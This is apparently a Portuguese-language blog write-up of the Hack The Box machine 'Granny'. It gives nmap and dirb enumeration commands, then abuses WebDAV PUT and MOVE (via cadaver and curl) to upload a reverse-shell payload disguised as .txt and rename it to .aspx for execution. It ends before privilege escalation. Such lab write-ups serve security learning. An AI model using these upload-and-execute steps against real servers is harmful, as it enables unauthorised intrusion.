Granny - HTB Write Up - Webdav exploit
Enumeração Geral
nmap -Pn -T5 -p- --open [IP]
Fuzzing
dirb [URL] -w /usr/share/dirb/wordlists/small.txt
O método PUT está habilitado no servidor e permite criar um arquivo.
O protocolo Webdav está habilitado no servidor.
nmap -Pn -T5 -p 80 --script http-webdav-scan [IP]
Validação dos tipos de arquivos que o servidor aceita para upload e para execução.
Arquivos adicionados no servidor.
Usando a ferramenta cadaver é possível obter acesso ao diretório raiz / do servidor e usar o comando move para alterar o arquivo teste.txt para rshell.asp.
No entanto, a extensão .asp não é executada pelo servidor.
Criei um novo arquivo com o payload da shell-reversa usando a extensão .aspx.
Também usei o payload do tipo stateless (windows/shell_reverse_tcp) pois o payload do tipo statefull (windows/shell/reverse_tcp) não funcionou.
Na máquina-atacante, alterei a extensão do arquivo da shell-reversa para .txt e fiz o upload para o servidor usando a ferramenta cadaver.
Depois usando o comando move alterei a extensão .txt para aspx do arquivo rshell.
move rshell.txt rshell.aspx
O processo de upload e alteração da extensão do arquivo também pode ser feito usando o cURL.
curl -X PUT http://10.129.95.234/shell.txt --data-binary @shell.txtcurl -X MOVE --header 'Destination:http://10.129.95.234/shell.aspx' 'http://10.129.95.234/shell.txt'
Na sequencia, executei a shell no servidor http://[IP]/rshell.aspx
E a conexão reversa foi estabelecida.
O servidor tem dois usuários Lakis e Administrator.
Informações do servidor: Windows Server 2003
systeminfo
A próxima etapa é fazer a escalação de privilégio. [TO BE CONTINUE...]
Comentários
Postar um comentário